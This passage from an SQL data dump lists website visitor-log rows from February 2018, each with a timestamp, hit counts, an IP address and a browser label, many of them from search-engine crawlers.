2,2,0,0,'91.196.178.66','chrome'),(206018,1517840042,1,1,0,0,'37.73.217.203','chrome'),(206019,1517840640,1,1,0,0,'46.175.16.100','chrome'),(206020,1517841069,1,1,0,0,'157.55.39.233','other'),(206021,1517841169,3,3,0,0,'91.196.178.66','chrome'),(206022,1517841661,1,1,0,0,'40.77.167.122','other'),(206023,1517841712,2,2,0,0,'77.111.244.55','chrome'),(206024,1517842375,1,1,0,0,'91.196.177.46','chrome'),(206025,1517842544,1,1,0,0,'37.73.218.98','chrome'),(206026,1517842929,1,1,0,0,'8.29.198.26','other'),(206027,1517843010,1,0,1,0,'66.249.66.155',''),(206028,1517843440,1,1,0,0,'37.9.113.60','other'),(206029,1517843494,1,1,0,0,'91.196.178.74','firefox'),(206030,1517844013,2,2,0,0,'91.196.178.66','chrome'),(206031,1517845073,1,1,0,0,'213.180.203.7','other'),(206032,1517845075,1,1,0,0,'141.8.132.19','other'),(206033,1517845975,1,1,0,0,'93.74.67.242','chrome'),(206034,1517846021,3,3,0,0,'91.196.177.134','chrome'),(206035,1517847430,1,1,0,0,'141.8.142.126','other'),(206036,1517847523,1,1,0,0,'87.250.224.66','other'),(206037,1517848414,1,1,0,0,'157.55.39.102','other'),(206038,1517849334,1,1,0,0,'213.180.203.8','other'),(206039,1517849362,1,1,0,0,'141.8.142.74','other'),(206040,1517849399,1,0,1,0,'66.249.66.157',''),(206041,1517850056,1,1,0,0,'213.180.203.40','other'),(206042,1517850689,1,1,0,0,'40.77.167.83','other'),(206043,1517853758,1,1,0,0,'8.29.198.27','other'),(206044,1517853846,5,5,0,0,'37.55.227.215','chrome'),(206045,1517854064,48,48,0,0,'138.201.215.222','chrome'),(206046,1517854202,1,1,0,0,'178.154.171.4','other'),(206047,1517855985,10,10,0,0,'37.55.227.215','chrome'),(206048,1517856559,1,1,0,0,'37.147.233.113','msie'),(206049,1517856600,2,2,0,0,'91.196.178.1','chrome'),(206050,1517857617,2,2,0,0,'91.196.178.168','chrome'),(206051,1517857817,1,1,0,0,'46.188.18.134','msie'),(206052,1517859957,1,1,0,0,'37.9.113.100','other'),(206053,1517860031,1,1,0,0,'141.8.142.96','other'),(206054,1517860640,1,1,0,0,'178.154.171.88','other'),(206055,1517860661,1,1,0,0,'5.45.207.58','other'),(206056,1517860665,1,1,0,0,'5.255.253.35','other'),(206057,1517860681,1,1,0,0,'157.55.39.102','other'),(206058,1517861697,1,1,0,0,'37.9.113.101','other'),(206059,1517863142,1,1,0,0,'207.46.13.157','other'),(206060,1517863198,1,1,0,0,'216.244.66.237','other'),(206061,1517863980,1,1,0,0,'207.46.13.110','other'),(206062,1517864580,1,1,0,0,'8.29.198.27','other'),(206063,1517865808,1,1,0,0,'87.250.224.77','other'),(206064,1517865976,1,1,0,0,'87.250.224.96','other'),(206065,1517866281,1,1,0,0,'91.209.11.236','other'),(206066,1517866487,1,1,0,0,'95.108.181.102','other'),(206067,1517867163,1,1,0,0,'207.46.13.157','other'),(206068,1517869019,1,1,0,0,'141.8.142.123','other'),(206069,1517869373,1,0,1,0,'66.249.66.157',''),(206070,1517870959,1,1,0,0,'188.165.4.128','firefox'),(206071,1517872190,1,1,0,0,'40.77.167.43','other'),(206072,1517872304,1,1,0,0,'5.3.235.210','chrome'),(206073,1517872543,1,1,0,0,'37.9.113.56','other'),(206074,1517872558,1,1,0,0,'95.108.213.24','other'),(206075,1517874817,1,1,0,0,'5.165.235.82','firefox'),(206076,1517875306,1,1,0,0,'188.165.4.128','firefox'),(206077,1517875410,1,1,0,0,'8.29.198.27','other'),(206078,1517876915,1,1,0,0,'178.159.37.11','chrome'),(206079,1517878897,1,1,0,0,'40.77.167.81','other'),(206080,1517879000,1,1,0,0,'87.250.224.66','other'),(206081,1517880596,1,1,0,0,'40.77.167.44','other'),(206082,1517881175,1,1,0,0,'87.250.224.125','other'),(206083,1517882574,1,1,0,0,'37.9.113.207','other'),(206084,1517883294,1,1,0,0,'87.250.224.96','other'),(206085,1517884689,1,1,0,0,'40.77.167.81','other'),(206086,1517885061,1,1,0,0,'37.9.113.82','other'),(206087,1517885065,1,1,0,0,'37.9.113.63','other'),(206088,1517886246,1,1,0,0,'8.29.198.26','other'),(206089,1517886564,1,1,0,0,'180.76.15.6','other'),(206090,1517887062,1,1,0,0,'37.9.113.151','other'),(206091,1517887672,1,1,0,0,'40.77.167.44','other'),(206092,1517887898,1,1,0,0,'87.250.224.66','other'),(206093,1517887901,1,1,0,0,'37.9.113.132','other'),(206094,1517888155,1,1,0,0,'54.89.179.184','other'),(206095,1517890214,1,1,0,0,'5.45.207.69','other'),(206096,1517890541,12,12,0,0,'69.30.211.2','other'),(206097,1517890560,1,0,1,0,'66.249.66.155',''),(206098,1517891739,1,1,0,0,'178.154.171.24','other'),(206099,1517892216,1,1,0,0,'40.77.167.81','other'),(206100,1517892617,1,0,1,0,'66.249.66.155',''),(206101,1517893481,1,1,0,0,'141.8.142.29','other'),(206102,1517893614,1,1,0,0,'37.9.113.82','other'),(206103,1517895118,1,1,0,0,'194.187.170.104','other'),(206104,1517895126,6,6,0,0,'88.198.16.12','other'),(206105,1517895150,1,1,0,0,'66.249.66.157','chrome'),(206106,1517896716,1,1,0,0,'37.9.113.186','other'),(206107,1517896845,1,1,0,0,'54.165.59.7','other'),(206108,1517897071,1,1,0,0,'8.29.198.26','other'),(206109,1517897280,1,0,1,0,'66.249.66.157',''),(206110,1517898063,1,1,0,0,'65.55.210.132','other'),(206111,1517898307,1,1,0,0,'95.28.190.43','msie'),(206112,1517898490,1,1,0,0,'37.9.113.60','other'),(206113,1517898698,1,1,0,0,'178.92.198.49','chrome'),(206114,1517898827,1,1,0,0,'94.230.204.21','chrome'),(206115,1517899403,1,1,0,0,'37.9.113.56','other'),(206116,1517899406,1,1,0,0,'5.45.207.58','other'),(206117,1517900032,1,0,1,0,'66.249.66.155',''),(206118,1517900427,2,2,0,0,'91.196.178.83','chrome'),(206119,1517900786,1,1,0,0,'37.9.113.101','other'),(206120,1517901235,1,1,0,0,'91.124.238.55','chrome'),(206121,1517901372,1,1,0,0,'40.77.167.42','other'),(206122,1517901686,1,1,0,0,'37.9.113.80','other'),(206123,1517902284,1,1,0,0,'40.77.167.44','other'),(206124,1517902619,1,1,0,0,'35.168.1.45','other'),(206125,1517904299,1,1,0,0,'188.230.43.254','other'),(206126,1517904539,2,2,0,0,'195.230.119.34','chrome'),(206127,1517904569,1,1,0,0,'87.250.224.39','other'),(206128,1517905063,1,1,0,0,'40.77.167.56','other'),(206129,1517905661,1,1,0,0,'40.77.167.44','other'),(206130,1517905750,1,1,0,0,'37.52.16.119','chrome'),(206131,1517906012,1,1,0,0,'157.55.13.65','other'),(206132,1517906223,1,1,0,0,'66.249.66.74','chrome'),(206133,1517906372,1,1,0,0,'66.249.66.156','chrome'),(206134,1517906660,1,1,0,0,'87.250.224.96','other'),(206135,1517907057,2,2,0,0,'91.196.177.147','chrome'),(206136,1517907314,1,1,0,0,'31.43.31.25','chrome'),(206137,1517907804,1,0,1,0,'66.249.66.155',''),(206138,1517907900,1,1,0,0,'8.29.198.25','other'),(206139,1517908155,2,2,0,0,'91.196.178.66','chrome'),(206140,1517908252,1,1,0,0,'216.244.66.237','other'),(206141,1517908758,8,8,0,0,'46.4.87.205','other'),(206142,1517908927,2,2,0,0,'95.132.62.76','firefox'),(206143,1517908952,1,0,1,0,'66.249.66.75',''),(206144,1517910038,1,1,0,0,'40.77.167.44','other'),(206145,1517910046,1,1,0,0,'37.9.113.82','other'),(206146,1517910497,2,2,0,0,'95.213.141.124','opera'),(206147,1517910530,1,1,0,0,'37.53.123.112','chrome'),(206148,1517910944,9,9,0,0,'91.196.178.66','chrome'),(206149,1517911279,1,1,0,0,'91.196.178.100','chrome'),(206150,1517911332,1,1,0,0,'141.8.142.29','other'),(206151,1517911866,1,1,0,0,'40.77.167.44','other'),(206152,1517911970,1,1,0,0,'95.134.97.244','chrome'),(206153,1517912202,1,1,0,0,'91.196.178.100','chrome'),(206154,1517912264,1,1,0,0,'46.149.83.248','firefox'),(206155,1517912893,1,1,0,0,'40.77.167.56','other'),(206156,1517913404,2,2,0,0,'91.196.177.15','chrome'),(206157,1517913598,1,1,0,0,'124.124.14.93','chrome'),(206158,1517914114,1,1,0,0,'95.134.97.244','chrome'),(206159,1517914385,1,1,0,0,'91.196.178.66','chrome'),(206160,1517915205,1,1,0,0,'66.249.66.155','chrome'),(206161,1517915386,1,0,1,0,'66.249.66.75',''),(206162,1517915632,1,1,0,0,'40.77.167.81','other'),(206163,1517915682,6,6,0,0,'91.196.177.46','chrome'),(206164,1517915727,1,1,0,0,'40.77.167.44','other'),(206165,1517916395,1,1,0,0,'141.8.142.96','other'),(206166,1517917094,1,1,0,0,'37.9.113.80','other'),(206167,1517918651,1,1,0,0,'141.8.142.96','other'),(206168,1517918726,1,1,0,0,'8.29.198.26','other'),(206169,1517919209,1,1,0,0,'91.196.178.100','chrome'),(206170,1517919882,2,2,0,0,'130.180.216.68','chrome'),(206171,1517920026,1,1,0,0,'91.192.135.241','firefox'),(206172,1517920125,1,1,0,0,'91.196.178.100','chrome'),(206173,1517920188,1,1,0,0,'87.250.224.96','other'),(206174,1517920320,1,1,0,0,'178.154.171.24','other'),(206175,1517921326,1,1,0,0,'87.250.224.77','other'),(206176,1517923025,1,1,0,0,'37.9.113.82','other'),(206177,1517923037,1,1,0,0,'93.170.15.82','chrome'),(206178,1517923492,1,1,0,0,'91.196.177.15','chrome'),(206179,1517923794,1,1,0,0,'124.124.14.93','chrome'),(206180,1517923953,2,2,0,0,'195.5.15.112','chrome'),(206181,1517924155,1,1,0,0,'195.10.210.70','chrome'),(206182,1517924250,2,2,0,0,'91.196.178.166','chrome'),(206183,1517924511,2,2,0,0,'91.196.178.161','chrome'),(206184,1517924708,63,63,0,0,'5.9.156.74','other'),(206185,1517925339,1,0,1,0,'66.249.66.155',''),(206186,1517925348,1,1,0,0,'195.10.210.70','chrome'),(206187,1517925411,1,1,0,0,'141.8.142.123','other'),(206188,1517925748,1,1,0,0,'141.8.142.96','other'),(206189,1517925928,1,1,0,0,'54.37.139.46','other'),(206190,1517925949,1,1,0,0,'93.185.213.56','chrome'),(206191,1517926422,4,4,0,0,'91.196.178.66','chrome'),(206192,1517927016,1,1,0,0,'37.9.113.186','other'),(206193,1517927020,1,1,0,0,'5.255.253.35','other'),(206194,1517927070,1,1,0,0,'13.56.229.65','chrome'),(206195,1517927141,1,1,0,0,'141.8.132.22','other'),(206196,1517927145,1,1,0,0,'37.9.113.132','other'),(206197,1517927496,2,0,2,0,'66.249.66.155',''),(206198,1517927575,1,1,0,0,'91.196.177.46','firefox'),(206199,1517928693,1,1,0,0,'188.230.43.254','other'),(206200,1517928884,1,1,0,0,'216.244.66.237','other'),(206201,1517929446,2,2,0,0,'40.77.167.42','other'),(206202,1517929560,1,1,0,0,'8.29.198.25','other'),(206203,1517930824,1,1,0,0,'5.165.235.82','firefox'),(206204,1517930859,1,1,0,0,'91.196.178.71','firefox'),(206205,1517930899,1,1,0,0,'95.108.181.111','other'),(206206,1517931092,1,1,0,0,'188.230.43.254','other'),(206207,1517931439,1,1,0,0,'130.180.218.16','chrome'),(206208,1517931553,1,1,0,0,'40.77.167.44','other'),(206209,1517932637,1,1,0,0,'141.8.142.126','other'),(206210,1517932900,1,1,0,0,'5.45.207.69','other'),(206211,1517933491,1,1,0,0,'188.230.43.254','other'),(206212,1517933565,1,0,1,0,'66.249.66.155',''),(206213,1517933818,1,1,0,0,'95.108.213.24','other'),(206214,1517934536,1,1,0,0,'37.9.113.151','other'),(206215,1517934563,1,1,0,0,'37.9.113.186','other'),(206216,1517934622,1,1,0,0,'87.250.224.77','other'),(206217,1517934655,1,1,0,0,'178.154.200.28','other'),(206218,1517934660,1,1,0,0,'213.180.203.7','other'),(206219,1517935890,1,1,0,0,'188.230.43.254','other'),(206220,1517936863,1,0,1,0,'66.249.66.156',''),(206221,1517937518,1,0,1,0,'66.249.66.155',''),(206222,1517938256,1,1,0,0,'141.8.142.123','other'),(206223,1517938296,1,1,0,0,'188.230.43.254','other'),(206224,1517939121,1,1,0,0,'141.8.142.29','other'),(206225,1517940051,1,1,0,0,'5.45.207.83','other'),(206226,1517940384,1,1,0,0,'8.29.198.27','other'),(206227,1517940696,1,1,0,0,'188.230.43.254','other'),(206228,1517943177,1,1,0,0,'178.154.200.28','other'),(206229,1517943178,1,1,0,0,'87.250.224.39','other'),(206230,1517945485,1,1,0,0,'188.163.10.160','chrome'),(206231,1517945895,1,1,0,0,'66.249.66.155','chrome'),(206232,1517947463,1,1,0,0,'178.154.171.24','other'),(206233,1517947670,1,1,0,0,'107.167.104.126','other'),(206234,1517947760,1,1,0,0,'37.9.113.110','other'),(206235,1517948171,1,0,1,0,'66.249.66.156',''),(206236,1517949131,1,1,0,0,'141.8.142.29','other'),(206237,1517949878,1,1,0,0,'89.178.232.55','msie'),(206238,1517949999,2,2,0,0,'91.196.178.27','chrome'),(206239,1517950607,1,1,0,0,'37.9.113.151','other'),(206240,1517951157,1,1,0,0,'66.249.66.155','chrome'),(206241,1517951209,1,1,0,0,'8.29.198.25','other'),(206242,1517952407,1,1,0,0,'178.154.200.28','other'),(206243,1517952778,1,1,0,0,'141.8.142.50','other'),(206244,1517953305,1,0,1,0,'66.249.66.156',''),(206245,1517953796,2,2,0,0,'162.210.196.97','other'),(206246,1517953978,1,1,0,0,'91.209.11.236','other'),(206247,1517954056,1,1,0,0,'66.249.66.157','chrome'),(206248,1517954204,1,0,1,0,'66.249.66.155',''),(206249,1517954511,1,1,0,0,'34.204.82.181','other'),(206250,1517954820,1,1,0,0,'141.8.142.29','other'),(206251,1517954824,1,1,0,0,'37.9.113.182','other'),(206252,1517957761,1,1,0,0,'40.77.167.10','other'),(206253,1517958068,1,1,0,0,'213.108.45.162','firefox'),(206254,1517959036,1,1,0,0,'95.108.213.24','other'),(206255,1517959155,60,60,0,0,'94.154.239.69','other'),(206256,1517959695,2,2,0,0,'5.9.144.234','other'),(206257,1517960319,1,1,0,0,'95.108.181.111','other'),(206258,1517960751,1,1,0,0,'180.76.15.149','other'),(206259,1517960773,2,2,0,0,'88.198.67.69','other'),(206260,1517961618,1,1,0,0,'66.249.73.135','chrome'),(206261,1517962041,1,1,0,0,'8.29.198.25','other'),(206262,1517962617,1,1,0,0,'141.8.142.126','other'),(206263,1517962897,1,1,0,0,'37.9.113.134','other'),(206264,1517963780,1,0,1,0,'66.249.73.131',''),(206265,1517963811,1,1,0,0,'74.115.214.146','other'),(206266,1517963914,1,1,0,0,'216.244.66.237','other'),(206267,1517963944,1,1,0,0,'141.8.142.123','other'),(206268,1517964033,1,0,1,0,'66.249.73.135',''),(206269,1517965362,1,1,0,0,'5.35.67.28','chrome'),(206270,1517966845,1,1,0,0,'40.77.167.10','other'),(206271,1517968302,10,10,0,0,'144.76.8.66','other'),(206272,1517969660,1,1,0,0,'141.8.142.74','other'),(206273,1517972872,1,1,0,0,'8.29.198.27','other'),(206274,1517973943,1,0,1,0,'66.249.73.131',''),(206275,1517978766,1,1,0,0,'178.154.200.32','other'),(206276,1517978784,1,0,1,0,'66.249.73.131',''),(206277,1517978798,1,1,0,0,'213.180.203.40','other'),(206278,1517981389,2,2,0,0,'91.196.178.49','chrome'),(206279,1517981842,1,1,0,0,'213.227.252.83','firefox'),(206280,1517982111,1,1,0,0,'91.225.166.107','other'),(206281,1517983700,1,1,0,0,'8.29.198.27','other'),(206282,1517984355,1,1,0,0,'90.154.88.204','chrome'),(206283,1517985615,1,1,0,0,'87.250.224.39','other'),(206284,1517985682,1,1,0,0,'94.179.227.1','chrome'),(206285,1517986270,1,1,0,0,'91.196.178.165','chrome'),(206286,1517987559,1,1,0,0,'91.196.178.93','firefox'),(206287,1517988531,2,2,0,0,'91.196.178.93','chrome'),(206288,1517988675,1,1,0,0,'40.77.167.181','other'),(206289,1517988949,1,1,0,0,'91.196.178.93','firefox'),(206290,1517989442,3,3,0,0,'91.196.177.15','chrome'),(206291,1517990551,2,2,0,0,'91.196.178.66','chrome'),(206292,1517990812,1,1,0,0,'92.113.94.129','chrome'),(206293,1517991596,1,1,0,0,'91.196.177.15','chrome'),(206294,1517992583,1,1,0,0,'178.94.167.171','chrome'),(206295,1517993844,1,1,0,0,'141.8.142.50','other'),(206296,1517993869,1,1,0,0,'213.180.203.8','other'),(206297,1517994456,1,1,0,0,'40.77.167.32','other'),(206298,1517994521,1,1,0,0,'8.29.198.25','other'),(206299,1517994566,1,1,0,0,'95.132.63.179','firefox'),(206300,1517996207,1,1,0,0,'193.219.124.34','other'),(206301,1517996231,1,1,0,0,'37.112.231.212','msie'),(206302,1517996235,1,1,0,0,'2.92.35.126','msie'),(206303,1517996925,1,1,0,0,'40.77.167.188','other'),(206304,1517997867,1,1,0,0,'91.196.178.87','chrome'),(206305,1517998075,1,1,0,0,'37.52.23.86','firefox'),(206306,1517998130,1,1,0,0,'157.55.39.7','other'),(206307,1517998515,3,3,0,0,'91.196.178.163','chrome'),(206308,1517998659,1,0,1,0,'66.249.73.131',''),(206309,1517998800,2,2,0,0,'91.196.178.66','chrome'),(206310,1517999267,1,1,0,0,'40.77.167.188','other'),(206311,1517999582,1,1,0,0,'40.77.167.181','other'),(206312,1517999786,1,1,0,0,'91.196.178.28','chrome'),(206313,1518000677,2,2,0,0,'40.77.167.181','other'),(206314,1518000709,1,1,0,0,'178.154.200.28','other'),(206315,1518001124,1,0,1,0,'66.249.65.158',''),(206316,1518001145,2,2,0,0,'91.196.178.65','chrome'),(206317,1518001147,2,2,0,0,'91.196.178.163','chrome'),(206318,1518001627,1,1,0,0,'178.94.180.83','chrome'),(206319,1518001636,1,1,0,0,'92.112.125.243','chrome'),(206320,1518002440,2,2,0,0,'130.180.217.101','chrome'),(206321,1518002642,1,1,0,0,'91.196.178.13','chrome'),(206322,1518002888,1,1,0,0,'178.154.200.28','other'),(206323,1518003179,1,1,0,0,'82.207.121.233','chrome'),(206324,1518004062,1,1,0,0,'40.77.167.32','other'),(206325,1518004483,6,6,0,0,'176.31.101.111','other'),(206326,1518005353,1,1,0,0,'8.29.198.27','other'),(206327,1518005837,1,1,0,0,'128.72.208.183','msie'),(206328,1518006784,2,2,0,0,'91.196.178.93','chrome'),(206329,1518007118,4,4,0,0,'91.196.178.65','chrome'),(206330,1518007403,1,1,0,0,'40.77.167.181','other'),(206331,1518008414,1,1,0,0,'95.132.104.243','chrome'),(206332,1518008816,1,1,0,0,'40.77.167.188','other'),(206333,1518009003,2,2,0,0,'108.59.8.70','other'),(206334,1518009029,1,1,0,0,'40.77.167.32','other'),(206335,1518009807,2,2,0,0,'91.196.178.89','chrome'),(206336,1518009896,1,1,0,0,'91.209.11.236','other'),(206337,1518011264,1,1,0,0,'37.9.113.134','other'),(206338,1518011472,1,1,0,0,'37.52.23.86','firefox'),(206339,1518011877,2,2,0,0,'91.196.178.89','chrome'),(206340,1518012088,1,0,1,0,'66.249.73.131',''),(206341,1518012104,1,1,0,0,'91.196.177.63','chrome'),(206342,1518012411,1,1,0,0,'185.177.191.72','chrome'),(206343,1518012840,1,1,0,0,'157.55.39.7','other'),(206344,1518013791,1,1,0,0,'91.196.178.167','chrome'),(206345,1518014511,1,1,0,0,'91.196.178.78','firefox'),(206346,1518015766,1,1,0,0,'178.92.5.187','chrome'),(206347,1518015772,2,2,0,0,'91.196.178.89','chrome'),(206348,1518016186,1,1,0,0,'8.29.198.27','other'),(206349,1518016470,3,3,0,0,'91.196.178.86','chrome'),(206350,1518017098,1,1,0,0,'92.112.125.243','chrome'),(206351,1518018024,2,2,0,0,'91.196.178.163','chrome'),(206352,1518018106,1,1,0,0,'40.77.167.32','other'),(206353,1518018275,1,1,0,0,'188.230.43.254','other'),(206354,1518018538,1,1,0,0,'157.55.39.7','other'),(206355,1518019798,1,1,0,0,'66.249.73.137','chrome'),(206356,1518020658,1,1,0,0,'188.230.43.254','other'),(206357,1518021029,1,1,0,0,'37.9.113.60','other'),(206358,1518021166,1,1,0,0,'66.249.73.137','chrome'),(206359,1518021209,1,1,0,0,'66.249.65.156','chrome'),(206360,1518021262,11,11,0,0,'23.237.4.26','other'),(206361,1518021576,1,1,0,0,'188.230.43.254','other'),(206362,1518022030,2,2,0,0,'178.92.251.181','chrome'),(206363,1518023658,1,1,0,0,'188.230.43.254','other'),(206364,1518024621,1,1,0,0,'46.161.9.39','chrome'),(206365,1518025075,1,1,0,0,'74.115.214.140','other'),(206366,1518025388,1,1,0,0,'157.55.39.7','other'),(206367,1518026121,2,2,0,0,'91.196.178.35','chrome'),(206368,1518026190,2,2,0,0,'95.67.126.42','chrome'),(206369,1518026653,1,1,0,0,'107.167.109.27','other'),(206370,1518026777,1,1,0,0,'157.55.39.240','other'),(206371,1518027018,1,1,0,0,'8.29.198.25','other'),(206372,1518028289,1,0,1,0,'66.249.73.135',''),(206373,1518029189,1,1,0,0,'40.77.167.181','other'),(206374,1518029980,4,4,0,0,'91.196.178.134','chrome'),(206375,1518031122,1,1,0,0,'141.8.142.29','other'),(206376,1518031758,1,0,1,0,'66.249.73.137',''),(206377,1518032937,1,1,0,0,'91.196.178.78','firefox'),(206378,1518033404,1,1,0,0,'40.77.167.48','other'),(206379,1518033652,2,0,2,0,'66.249.73.137',''),(206380,1518034775,1,1,0,0,'91.124.118.82','chrome'),(206381,1518035076,1,1,0,0,'40.77.167.131','other'),(206382,1518035588,1,1,0,0,'5.45.207.69','other'),(206383,1518036215,2,2,0,0,'91.196.178.29','chrome'),(206384,1518036357,1,1,0,0,'180.76.15.15','other'),(206385,1518036818,2,1,1,0,'66.249.73.131',''),(206386,1518037841,1,1,0,0,'8.29.198.27','other'),(206387,1518038817,1,1,0,0,'66.249.73.135','chrome'),(206388,1518038858,1,1,0,0,'66.249.73.131','chrome'),(206389,1518039453,1,1,0,0,'40.77.167.48','other'),(206390,1518040208,1,1,0,0,'66.249.73.131','chrome'),(206391,1518041071,1,1,0,0,'180.76.15.7','other'),(206392,1518041778,1,1,0,0,'5.58.2.165','opera'),(206393,1518042284,1,0,1,0,'66.249.73.131',''),(206394,1518043062,1,1,0,0,'37.9.113.157','other'),(206395,1518043238,1,1,0,0,'46.211.100.251','other'),(206396,1518043395,1,1,0,0,'35.168.1.45','other'),(206397,1518044363,1,1,0,0,'35.168.1.45','other'),(206398,1518044611,1,1,0,0,'87.250.224.96','other'),(206399,1518045235,1,1,0,0,'66.249.73.135','chrome'),(206400,1518045290,1,1,0,0,'35.168.1.45','other'),(206401,1518046168,1,1,0,0,'37.9.113.60','other'),(206402,1518046255,1,1,0,0,'35.168.1.45','other'),(206403,1518046443,1,1,0,0,'91.209.11.236','other'),(206404,1518047198,1,1,0,0,'35.168.1.45','other'),(206405,1518048140,1,1,0,0,'35.168.1.45','other'),(206406,1518048671,1,1,0,0,'8.29.198.27','other'),(206407,1518048898,1,1,0,0,'91.209.11.236','other'),(206408,1518049076,1,1,0,0,'35.168.1.45','other'),(206409,1518050273,1,1,0,0,'54.144.86.243','other'),(206410,1518052288,1,1,0,0,'184.94.240.92','firefox'),(206411,1518052641,1,0,1,0,'66.249.73.137',''),(206412,1518054824,1,1,0,0,'87.250.224.125','other'),(206413,1518055651,1,1,0,0,'178.159.215.14','firefox'),(206414,1518056359,1,1,0,0,'212.83.178.172','chrome'),(206415,1518057443,1,0,1,0,'66.249.73.135',''),(206416,1518058351,1,1,0,0,'40.77.167.149','other'),(206417,1518059460,1,1,0,0,'87.250.224.77','other'),(206418,1518059497,1,1,0,0,'8.29.198.26','other'),(206419,1518059557,1,1,0,0,'37.9.113.56','other'),(206420,1518060161,1,1,0,0,'180.76.15.14','other'),(206421,1518062005,2,2,0,0,'173.234.159.250','other'),(206422,1518063372,1,0,1,0,'66.249.73.137',''),(206423,1518065232,2,0,2,0,'66.249.73.137',''),(206424,1518065480,1,0,1,0,'66.249.73.135',''),(206425,1518066590,1,1,0,0,'213.227.252.83','firefox'),(206426,1518069321,1,1,0,0,'95.108.181.102','other'),(206427,1518070319,1,1,0,0,'8.29.198.26','other'),(206428,1518071461,1,1,0,0,'93.73.4.26','firefox'),(206429,1518071664,2,0,2,0,'66.249.73.135',''),(206430,1518071970,1,0,1,0,'66.249.73.131',''),(206431,1518072503,1,1,0,0,'91.196.178.65','chrome'),(206432,1518073016,2,2,0,0,'91.196.178.83','chrome'),(206433,1518073221,1,1,0,0,'95.108.181.102','other'),(206434,1518073273,2,2,0,0,'91.196.178.162','chrome'),(206435,1518073287,1,1,0,0,'46.201.116.134','chrome'),(206436,1518074258,2,2,0,0,'178.154.171.56','other'),(206437,1518074506,1,1,0,0,'91.196.178.13','chrome'),(206438,1518074761,1,0,1,0,'66.249.73.135',''),(206439,1518075894,1,1,0,0,'91.196.177.46','chrome'),(206440,1518076047,1,0,1,0,'66.249.73.137',''),(206441,1518076420,1,1,0,0,'87.250.224.125','other'),(206442,1518076697,1,1,0,0,'180.76.15.157','other'),(206443,1518076824,1,1,0,0,'216.244.66.237','other'),(206444,1518077362,1,0,1,0,'66.249.65.158',''),(206445,1518077697,1,1,0,0,'93.78.215.251','firefox'),(206446,1518079140,2,2,0,0,'91.196.178.89','chrome'),(206447,1518079528,1,1,0,0,'178.92.137.57','chrome'),(206448,1518079913,1,0,1,0,'66.249.73.131',''),(206449,1518081001,1,0,1,0,'66.249.73.135',''),(206450,1518081131,1,1,0,0,'91.196.178.100','chrome'),(206451,1518081144,1,1,0,0,'8.29.198.27','other'),(206452,1518081465,1,0,1,0,'66.249.65.157',''),(206453,1518082468,1,1,0,0,'178.95.246.225','chrome'),(206454,1518082855,1,1,0,0,'95.132.37.239','firefox'),(206455,1518083017,1,1,0,0,'95.132.27.175','firefox'),(206456,1518083188,1,1,0,0,'91.196.177.110','chrome'),(206457,1518083230,1,1,0,0,'178.154.200.28','other'),(206458,1518083991,1,1,0,0,'66.249.65.156','chrome'),(206459,1518083995,2,1,1,0,'66.249.73.137',''),(206460,1518084218,2,2,0,0,'91.196.178.65','chrome'),(206461,1518084401,1,1,0,0,'54.165.59.7','other'),(206462,1518084430,1,1,0,0,'95.132.27.175','firefox'),(206463,1518084523,1,1,0,0,'40.77.167.16','other'),(206464,1518084608,1,0,1,0,'66.249.73.131',''),(206465,1518085106,1,1,0,0,'188.163.18.2','firefox'),(206466,1518085345,2,2,0,0,'95.132.27.175','firefox'),(206467,1518085660,2,2,0,0,'91.196.178.89','chrome'),(206468,1518085890,1,1,0,0,'37.9.113.207','other'),(206469,1518085917,1,1,0,0,'92.112.243.139','chrome'),(206470,1518086149,1,0,1,0,'66.249.73.135',''),(206471,1518086773,2,2,0,0,'130.180.216.151','chrome'),(206472,1518086865,1,1,0,0,'94.179.161.139','chrome'),(206473,1518088098,2,2,0,0,'91.196.178.162','chrome'),(206474,1518088872,1,0,1,0,'66.249.64.73',''),(206475,1518089122,1,1,0,0,'95.28.167.99','msie'),(206476,1518091962,1,1,0,0,'8.29.198.25','other'),(206477,1518092656,1,0,1,0,'66.249.64.67',''),(206478,1518093110,1,0,1,0,'66.249.64.71',''),(206479,1518093790,31,31,0,0,'204.12.226.26','other'),(206480,1518093924,1,1,0,0,'91.196.178.162','chrome'),(206481,1518094001,1,1,0,0,'94.179.161.139','chrome'),(206482,1518094349,1,0,1,0,'66.249.64.73',''),(206483,1518094736,1,1,0,0,'46.133.207.67','other'),(206484,1518096239,1,1,0,0,'91.196.178.162','chrome'),(206485,1518096397,1,1,0,0,'107.150.59.98','other'),(206486,1518097104,1,0,1,0,'66.249.64.13',''),(206487,1518097114,1,1,0,0,'91.196.178.93','chrome'),(206488,1518097518,1,1,0,0,'107.167.106.60','other'),(206489,1518097775,1,0,1,0,'66.249.64.73',''),(206490,1518098603,1,1,0,0,'157.55.39.199','other'),(206491,1518099137,1,1,0,0,'91.196.178.70','chrome'),(206492,1518099616,2,2,0,0,'80.93.124.190','chrome'),(206493,1518099768,1,0,1,0,'66.249.64.67',''),(206494,1518100001,1,1,0,0,'130.180.212.111','chrome'),(206495,1518100102,2,2,0,0,'91.196.178.89','chrome'),(206496,1518100106,1,1,0,0,'157.55.39.199','other'),(206497,1518100603,1,1,0,0,'94.179.147.128','chrome'),(206498,1518101285,1,1,0,0,'91.196.177.46','chrome'),(206499,1518101989,1,0,1,0,'66.249.64.73',''),(206500,1518102782,1,1,0,0,'8.29.198.26','other'),(206501,1518102785,1,0,1,0,'66.249.64.14',''),(206502,1518102857,1,1,0,0,'188.230.43.254','other'),(206503,1518103013,1,1,0,0,'91.196.178.162','chrome'),(206504,1518103128,1,0,1,0,'66.249.64.67',''),(206505,1518103144,2,2,0,0,'91.196.178.83','chrome'),(206506,1518103300,1,0,1,0,'66.249.64.73',''),(206507,1518104167,2,2,0,0,'46.201.112.67','chrome'),(206508,1518104547,1,1,0,0,'46.242.72.2','msie'),(206509,1518105254,2,2,0,0,'91.196.178.35','chrome'),(206510,1518105260,1,1,0,0,'188.230.43.254','other'),(206511,1518105458,1,1,0,0,'216.244.66.237','other'),(206512,1518105548,1,0,1,0,'66.249.64.67',''),(206513,1518105986,1,0,1,0,'66.249.64.73',''),(206514,1518107599,1,1,0,0,'5.45.207.69','other'),(206515,1518107657,1,1,0,0,'188.230.43.254','other'),(206516,1518107679,2,2,0,0,'91.196.178.18','chrome'),(206517,1518108183,1,1,0,0,'166.62.126.3','chrome'),(206518,1518109155,1,1,0,0,'78.111.186.45','chrome'),(206519,1518109575,1,1,0,0,'66.249.64.13','chrome'),(206520,1518109580,1,1,0,0,'66.249.64.67','chrome'),(206521,1518109650,1,1,0,0,'178.154.171.56','other'),(206522,1518110663,1,1,0,0,'157.55.39.178','other'),(206523,1518110715,1,1,0,0,'188.230.43.254','other'),